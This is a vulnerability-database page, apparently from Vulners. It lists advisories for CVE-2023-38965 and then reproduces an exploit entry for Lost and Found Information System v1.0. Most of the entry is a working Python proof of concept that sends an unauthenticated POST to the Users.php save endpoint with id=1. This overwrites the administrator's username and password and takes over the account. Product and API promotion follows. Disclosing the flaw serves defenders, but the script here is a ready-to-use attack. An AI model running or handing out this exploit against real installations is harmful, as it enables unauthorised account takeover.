| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Lost and Found Information System v1.0 - ( IDOR ) leads to Account Take over Exploit | 13 Feb 202400:00 | – | zdt | |
| Lost and Found Information System security breach | 16 Oct 202300:00 | – | cnnvd | |
| CVE-2023-38965 | 3 Nov 202300:00 | – | cve | |
| CVE-2023-38965 | 3 Nov 202300:00 | – | cvelist | |
| EUVD-2023-42725 | 3 Oct 202520:07 | – | euvd | |
| CVE-2023-38965 | 3 Nov 202305:15 | – | nvd | |
| CVE-2023-38965 | 3 Nov 202305:15 | – | osv | |
| Lost And Found Information System 1.0 Insecure Direct Object Reference | 12 Oct 202300:00 | – | packetstorm | |
| Default credentials | 3 Nov 202305:15 | – | prion | |
| PT-2023-26707 | 2 Nov 202300:00 | – | ptsecurity |
# Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over
# Date: 2023-12-03
# Exploit Author: OR4NG.M4N
# Category : webapps
# CVE : CVE-2023-38965
Python p0c :
import argparse
import requests
import time
parser = argparse.ArgumentParser(description='Send a POST request to the target server')
parser.add_argument('-url', help='URL of the target', required=True)
parser.add_argument('-user', help='Username', required=True)
parser.add_argument('-password', help='Password', required=True)
args = parser.parse_args()
url = args.url + '/classes/Users.php?f=save'
data = {
'id': '1',
'firstname': 'or4ng',
'middlename': '',
'lastname': 'Admin',
'username': args.user,
'password': args.password
}
response = requests.post(url, data)
if b"1" in response.content:
print("Exploit ..")
time.sleep(1)
print("User :" + args.user + "\nPassword :" + args.password)
else:
print("Exploit Failed..")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation